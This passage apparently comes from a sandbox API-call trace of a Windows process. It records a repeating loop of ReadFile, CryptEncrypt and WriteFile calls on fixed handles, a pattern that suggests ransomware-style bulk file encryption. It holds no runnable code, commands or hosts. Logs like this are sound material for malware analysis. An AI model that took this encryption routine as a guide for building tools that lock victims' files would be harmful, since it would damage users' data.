lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0160.707] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.708] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.708] GetLastError () returned 0x0 [0160.708] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.709] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.709] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.709] GetLastError () returned 0x0 [0160.709] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.709] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.709] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.709] GetLastError () returned 0x0 [0160.709] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.710] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.710] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.710] GetLastError () returned 0x0 [0160.710] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.710] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.710] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.710] GetLastError () returned 0x0 [0160.710] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.710] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.710] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.710] GetLastError () returned 0x0 [0160.710] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.710] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.710] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.710] GetLastError () returned 0x0 [0160.710] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.710] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.710] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.710] GetLastError () returned 0x0 [0160.710] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.711] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.711] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.711] GetLastError () returned 0x0 [0160.711] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.711] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.711] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.711] GetLastError () returned 0x0 [0160.711] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.711] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.711] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.711] GetLastError () returned 0x0 [0160.711] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.711] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.711] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.711] GetLastError () returned 0x0 [0160.711] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.711] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.711] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.711] GetLastError () returned 0x0 [0160.711] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.711] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.711] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.711] GetLastError () returned 0x0 [0160.711] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.712] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.712] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.712] GetLastError () returned 0x0 [0160.712] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.712] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.712] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.712] GetLastError () returned 0x0 [0160.712] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.712] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.712] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.712] GetLastError () returned 0x0 [0160.712] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.712] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.712] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.712] GetLastError () returned 0x0 [0160.712] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.712] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.712] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.712] GetLastError () returned 0x0 [0160.712] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.712] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.712] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.713] GetLastError () returned 0x0 [0160.713] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.713] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.713] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.713] GetLastError () returned 0x0 [0160.713] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.713] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.713] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.713] GetLastError () returned 0x0 [0160.713] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.713] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.713] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.713] GetLastError () returned 0x0 [0160.713] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.713] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.713] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.713] GetLastError () returned 0x0 [0160.713] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.713] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.713] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.713] GetLastError () returned 0x0 [0160.713] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.713] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.713] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.714] GetLastError () returned 0x0 [0160.714] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.714] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.714] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.714] GetLastError () returned 0x0 [0160.714] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.714] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.714] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.714] GetLastError () returned 0x0 [0160.714] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.714] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.714] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.714] GetLastError () returned 0x0 [0160.714] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.714] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.714] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.714] GetLastError () returned 0x0 [0160.714] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.714] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.714] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.714] GetLastError () returned 0x0 [0160.714] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.714] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.715] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.715] GetLastError () returned 0x0 [0160.715] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, 